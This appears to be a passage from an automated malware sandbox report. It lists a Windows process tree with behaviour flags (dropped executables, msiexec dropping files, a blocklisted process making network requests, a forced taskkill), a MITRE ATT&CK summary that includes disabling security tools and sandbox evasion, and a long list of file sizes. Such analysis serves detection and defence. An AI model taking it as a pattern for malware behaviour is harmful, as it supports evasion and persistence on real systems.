C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 7580 -ip 75801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 12a4c9cf975f8eb39ddebe440a4ece63 WngpQnQSq025SyXEi3KSag.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 8588 -ip 85881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4728 -ip 47281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 12a4c9cf975f8eb39ddebe440a4ece63 WngpQnQSq025SyXEi3KSag.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 9048 -ip 90481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4173D2B74D748C0609D9735152403C1B C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F37024595B88610B30C3CCCDE91F2BE2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A0EEBD3CC8C5187FF2780F8C906EED E Global\MSI00002⤵
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2356 -ip 23561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 552 -ip 5521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5156 -ip 51561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5584 -ip 55841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8624 -ip 86241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 9944 -ip 99441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
4Install Root Certificate
1Modify Registry
8Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
3.3MB
-
Filesize
164KB
-
Filesize
372KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.3MB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
900KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.4MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
120KB
-
Filesize
80KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
164KB
-
Filesize
296KB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
408KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
128KB
-
Filesize
80KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
3.3MB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
436KB